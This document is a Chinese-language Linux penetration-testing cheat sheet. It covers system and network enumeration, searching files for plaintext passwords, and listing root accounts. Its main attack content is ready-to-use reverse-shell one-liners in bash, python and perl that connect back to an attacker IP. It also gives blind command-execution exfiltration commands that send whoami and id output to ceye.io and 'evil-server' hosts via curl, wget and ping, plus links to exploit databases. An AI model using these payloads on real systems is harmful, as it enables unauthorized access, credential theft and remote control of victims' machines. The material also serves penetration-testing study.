系统信息
操作系统版本
cat /etc/issue
cat /etc/lsb-release # Debian
内核版本
cat /proc/version
uname -a
正在运行的程序和权限
ps aux // ps aux | grep redis
ps -ef
top
cat /etc/services
应用
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
计划任务
crontab -l
存储的明文用户名,密码
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
列出超级用户
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
网络相关
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
网络通信
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
常用反弹
1. bash
attacker 监听
nc -lvvp 4444
victim 运行
bash -i >& /dev/tcp/<attackerip>/4444 0>&1
2. python
attacker 监听
nc -lvvp 4444
victim 运行
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3. perl脚本
perl -e 'use Socket;$i="<attackerip>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
无回显命令执行怎么破?
curl xxxx.ceye.io/`whoami`
curl http://xxxx.ceye.io/$(id|base64)
wget http://evil-server/$(whoami)
ping -c 1 `whoami`.xxxx.ceye.io
安利工具
安利一个一键在线生成反弹shell网站
https://krober.biz/misc/reverse_shell.php
漏洞搜索
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com